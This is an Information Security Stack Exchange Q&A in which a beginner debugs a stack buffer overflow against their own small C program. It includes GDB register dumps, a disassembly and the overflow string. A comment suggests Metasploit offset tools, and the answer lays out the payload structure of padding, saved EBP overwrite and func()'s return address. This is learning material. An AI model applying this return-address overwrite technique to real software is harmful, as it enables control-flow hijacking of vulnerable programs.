current community

your communities

more stack exchange communities

Stack Exchange
tour help
Take the 2-minute tour ×
Information Security Stack Exchange is a question and answer site for information security professionals. It's 100% free, no registration required.
up vote -1 down vote favorite

I'm beginner in exploits. So I had type simple program in C

#include <stdio.h>

void func(){
    printf("asd");
}
main(){
    char buf[100];
    scanf("%s", &buf);
}

My goal is to run the func() and print asd. With 116 'A's I'm over writing the EIP but when I change the last 4 A's with the memory address of the function(in reverse order) and run the program again the EIP is something completely different. Here are details form GDB:

Starting program: /root/Documents/C/overflow/stack 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info registers
eax            0x1  1
ecx            0x1  1
edx            0xb7fbd354   -1208233132
ebx            0xb7fbbff4   -1208238092
esp            0xbffff4d0   0xbffff4d0
ebp            0x41414141   0x41414141
esi            0x0  0
edi            0x0  0
eip            0x41414141   0x41414141

With address of the func:

(gdb) disas func
Dump of assembler code for function func:
   0x0804846c <+0>: push   %ebp
   0x0804846d <+1>: mov    %esp,%ebp
   0x0804846f <+3>: sub    $0x18,%esp
   0x08048472 <+6>: movl   $0x8048530,(%esp)
   0x08048479 <+13>:    call   0x8048340 <printf@plt>
   0x0804847e <+18>:    leave  
   0x0804847f <+19>:    ret 

Starting program: /root/Documents/C/overflow/stack 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x6c\x84\x04\x08

Program received signal SIGSEGV, Segmentation fault.
0x6336785c in ?? ()

If I add more A's to the string the EIP start overflowing with A's again I mean

Adding 1 A EIP = 0x36785c41
Adding 2 A's EIP = 0x785c4141
Adding 3 A's EIP = 0x78414141
Adding 4 A's EIP = 0x41414141

I'm running Linux, I didn't remove or edit anything in the kernel so there my be protections. Also I didn't disable any function on gcc, and the compiler is gcc =D.

Any help is welcome. Thanks in advance.

share|improve this question
    
Use the pattern_create.rb and pattern_offset.rb scripts in Metasploit for exactly finding the length of the buffer overwriting the EIP. You mentioned that EIP is overwritten by 116 A's even though the number of A's in the first example is 118 that is why pattern_offset is going to tell you the exact length of the pattern needed. –  void_in May 5 '14 at 5:03

1 Answer 1

up vote 0 down vote

I could successfully exploit the buffer overflow Your exploit code is wrong.

You are passing address of func() as it is in hex form. You need to first convert \x6c\x84\x04\x08

into ASCII using python you can do it.

On my system it comes out to be lä♦

Exploit should be B1=AAAA...(size of buffer,120 in my case)

B2=BBBB....(override ebp)

R.A. of func()=lä♦

exploit =B1+B2+lä♦

Also set gdb syntax to intel for better readibility.

Always check out EBP to see if size of exploit code is correct.

In this case if EBP=42424242 that means number of A's is correct that is we are moving in right direction

share|improve this answer

Your Answer

 
discard

By posting your answer, you agree to the privacy policy and terms of service.

Not the answer you're looking for? Browse other questions tagged or ask your own question.